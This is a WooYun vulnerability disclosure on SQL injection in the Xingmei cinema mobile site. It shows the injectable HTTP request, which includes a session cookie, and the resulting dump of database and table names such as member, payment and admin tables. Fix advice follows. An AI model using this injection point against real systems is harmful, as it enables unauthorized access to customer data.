2015-12-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-02-04: 厂商已经主动忽略漏洞,细节向公众公开
星美国际电影城手机端服务器存在 SQL 注入。
GET /include/showing_ajax.php?cinema_id=*&date_str=2015-12-20&film_id_str=001105952015,001205952015,001405952015,001905952015&op=get_search_showing_list&return_type=json HTTP/1.1
Cookie: Hm_lpvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; Hm_lvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; _cityid=1001; _selectCinema_id=XM20003402; _selectCinema_aid=108693; PHPSESSID=i7ijhp9hpqq3mav1hkgbvunh97
Host: m.ixingmei.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
available databases [24]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] pl_account_db
[*] pl_ad_db
[*] pl_app_db
[*] pl_common_db
[*] pl_general_db
[*] pl_hot_db
[*] pl_im_db
[*] pl_image_db
[*] pl_mc_db
[*] pl_mobile
[*] pl_movie_db
[*] pl_openfire_db
[*] pl_quartz_db
[*] pl_sender_db
[*] pl_star_db
[*] pl_user_db
[*] pl_visit_db
[*] sns
[*] ucenter
[*] webistrano_development
carriage_to |cms_active_count |cms_active_log |cms_addon_activity |cms_addon_chimelong |cms_addon_cinema |cms_addon_cinema_copy |cms_addon_cinema_copy1 |cms_addon_film |cms_addon_hall |cms_addon_product |cms_addon_seat_area |cms_addon_show |cms_addon_showing |cms_addon_star |cms_addon_venue |cms_addon_video |cms_addonarticle |cms_addonimages |cms_addoninfos |cms_addonshop |cms_addonsoft |cms_addonspec |cms_admin |cms_admintype |cms_advancedsearch |cms_apply_flink |cms_arcatt |cms_arccache |cms_archives |cms_arcmulti |cms_arcrank |cms_arctiny |cms_arctype |cms_area |cms_banner |cms_bannertype |cms_channeltype |cms_co_htmls |cms_co_mediaurls |cms_co_note |cms_co_onepage |cms_co_urls |cms_district |cms_district_bak |cms_district_copy |cms_diyforms |cms_downloads |cms_erradd |cms_feedback |cms_flink |cms_flinktype |cms_freelist |cms_homepageset |cms_keywords |cms_log |cms_mail_order |cms_mail_title |cms_mail_type |cms_member |cms_member_address |cms_member_bak |cms_member_captcha |cms_member_company |cms_member_copy |cms_member_copy_20130702 |cms_member_feed |cms_member_flink |cms_member_friends |cms_member_group |cms_member_guestbook |cms_member_invite |cms_member_mobile_captcha |cms_member_model |cms_member_msg |cms_member_operation |cms_member_person |cms_member_person_copy |cms_member_pms |cms_member_snsmsg |cms_member_space |cms_member_stow |cms_member_stowtype |cms_member_tj |cms_member_type |cms_member_validate |cms_member_vhistory |cms_moneycard_record |cms_moneycard_type |cms_mtypes |cms_multiserv_config |cms_myad |cms_mytag |cms_payment |cms_plus |cms_pwd_tmp |cms_ratings |cms_scores |cms_search_cache |cms_search_keywords |cms_sgpage |cms_shops_delivery |cms_shops_orders |cms_shops_products |cms_shops_userinfo |cms_softconfig |cms_stepselect |cms_sys_enum |cms_sys_module |cms_sys_set |cms_sys_task |cms_sysconfig |cms_tagindex |cms_taglist |cms_test |cms_test_mobile |cms_tl_card_meno |cms_tl_customer |cms_tl_log |cms_uploads |cms_verifies |cms_vote 
|customer_care |db_access_log |db_access_order |db_access_register |db_channel |db_tencent_order |db_tencent_order_cache |email_mod |mc_admin_group |mc_admin_index |mc_admin_index_group |mc_admin_index_module |mc_admin_module |mc_admin_module_group |mc_agent_account |mc_fp_bookings |mc_fp_bookings_copy |mc_fund_report |mc_kiosk_cinema |mc_kiosk_status |mc_log |mc_msg_tpl |mc_msg_type |mc_pwd_history |mc_review_order |msg_mod |payment_mod |shipping_mod |show_book_order |show_ddt_data |show_detail |show_discount |show_order |show_order_log |show_ticket |show_type_subcat |sms_statsa |tc_activity_area |tc_activity_coupon |tc_activity_index |tc_activity_inip |tc_activity_invite |tc_activity_limit |tc_activity_lottery |tc_activity_member |tc_activity_miaosha |tc_activity_miaosha_admin_op_log |tc_activity_miaosha_item |tc_activity_miaosha_item_detail |tc_activity_miaosha_member |tc_activity_miaosha_rule |tc_activity_notice |tc_activity_order_detail |tc_activity_pois |tc_activity_renren |tc_activity_renren_pois |tc_activity_scope |tc_activity_show |tc_activity_vote |tc_balance_binding |tc_balance_info |tc_balance_log |tc_balance_type |tc_balance_user |tc_cb_error |tc_cinema_coupon |tc_cinema_order |tc_class_log |tc_company_lottery |tc_coupon_audit |tc_coupon_batch |tc_coupon_card |tc_coupon_gift_tbl |tc_coupon_index |tc_coupon_index_copy |tc_coupon_info |tc_coupon_return |tc_coupon_return_order |tc_coupon_scope |tc_coupon_temp |tc_coupon_type |tc_daily_showing_counter |tc_download_sta |tc_exchange_lifecard |tc_feedback |tc_fp_cinema |tc_fp_cinema_copy |tc_guide_index |tc_guide_record |tc_hall |tc_hiring |tc_ip_limit |tc_keyword_group |tc_keyword_index |tc_lockseats |tc_lottery_index |tc_lottery_info |tc_lottery_log |tc_lowest_price |tc_lucky_draw_log |tc_lucky_draw_winners |tc_max_hall |tc_member_activity |tc_member_bind |tc_member_city_log |tc_member_opt |tc_member_vote |tc_member_winners |tc_mol_member_ticket |tc_mol_member_ticket_lan |tc_movie_ticket 
|tc_movie_ticket_tmp |tc_msg |tc_msg_log |tc_new_activity_index |tc_new_activity_member |tc_newipiao_order |tc_op_account |tc_op_strategy_dimensional |tc_op_strategy_index |tc_op_strategy_info |tc_order |tc_order_fail |tc_order_fy |tc_order_ok |tc_order_product |tc_osgh_user_tbl |tc_payment_error |tc_payment_info |tc_payment_scene |tc_payment_type |tc_price_default |tc_price_model |tc_price_period_details |tc_price_period_index |tc_price_period_scope |tc_price_ploy_cal |tc_price_ploy_index |tc_price_ploy_scope |tc_price_purchase |tc_price_scope |tc_scores_log |tc_seat |tc_send_sms |tc_serial_allot |tc_serial_info |tc_setting |tc_showing |tc_showing_block |tc_showing_increment_update_log |tc_showing_tmp |tc_third_success_order |tc_third_ticket |tc_uid_from |tc_unicom_code |tc_user_bind |tc_verify_mobile |tc_xm_card_recharge_log |tc_zy_all_cinema |tc_zy_cinema |tc_zy_coupon |tc_zy_order |theme_banner_tbl |theme_index_tbl |ticket_count |travel_order |travel_order_product_bridge |travel_product |travel_product_price |youbang |---------------------------------+
修复建议：对 cinema_id 等用户可控参数进行严格过滤，并改用预编译（参数化）查询，而不是直接拼接 SQL。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)